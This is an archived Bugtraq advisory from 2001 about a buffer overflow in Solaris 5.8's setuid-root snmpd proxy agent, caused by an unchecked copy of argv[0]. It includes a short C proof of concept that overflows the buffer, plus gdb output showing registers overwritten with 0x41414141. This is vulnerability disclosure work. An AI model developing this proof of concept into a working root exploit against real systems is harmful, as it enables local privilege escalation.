Bugtraq mailing list archives

Solaris 5.8 snmpd Vulnerability

From: Pablo Sor <psor () AFIP GOV AR>
Date: Tue, 13 Mar 2001 07:34:40 -0400

Description

The /opt/SUNWssp/snmpd command (SNMP proxy agent)  is suid root
and contains a buffer overflow, the problem occurs when it copy his own
name (argv[0]) to an internal variable without checking out
its lenght and this causes the overflow.

Vulnerable Version

Sun Solaris 5.8

Technical Description

-----------------------------------------------------

#include <stdio.h>

void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0);
}

-----------------------------------------------------

$ uname -a
SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

$ ./snmpd-demo 700
Segmentation Fault (core dumped)

$ gdb ./snmpd-demo --core=core

[..]

Program received signal SIGSEGV, Segmentation fault.
0xfee32b58 in strcpy () from /usr/lib/libc.so.1
(gdb) info registers
g0             0x0      0
g1             0x78000  491520
g2             0xff22579c       -14526564
g3             0xff162d78       -15323784
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x76f98  487320
o0             0x2c1    705
o1             0xffbed9b9       -4269639
o2             0x2c1    705
o3             0x41     65
o4             0xffbed180       -4271744
o5             0xff26a147       -14245561
sp             0xffbed658       -4270504
o7             0xfee83650       -18336176
l0             0x7efefeff       2130640639
l1             0x81010100       -2130640640
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x0      0
l6             0x0      0
l7             0x0      0
i0             0x41414141       1094795585   ;;;;;
i1             0xffbed6fc       -4270340     ; pointer to argv[0]
i2             0x41414141       1094795585   ;;;;;
i3             0x41414141       1094795585   ;;;;;
i4             0x81010100       -2130640640
i5             0xff00   65280
fp             0xffbed698       -4270440
i7             0xff265474       -14265228
y              0x6      6
psr            0xfe001000       -33550336
wim            0x0      0
tbr            0x0      0
pc             0xfee32b58       -18666664
npc            0xfee32b5c       -18666660
fpsr           0x0      0
cpsr           0x0      0

(gdb) x/20x $i1
0xffbed6fc:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed70c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed71c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed72c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed73c:  0x41414141   0x41414141   0x41414141   0x41414141


Pablo Sor
psor () afip gov ar

Current thread:

Solaris 5.8 snmpd Vulnerability Pablo Sor (Mar 13)
- Re: Solaris 5.8 snmpd Vulnerability Rob Bartlett - HES CTE (Mar 15)
- <Possible follow-ups>
- Re: Solaris 5.8 snmpd Vulnerability Darren Moffat (Mar 14)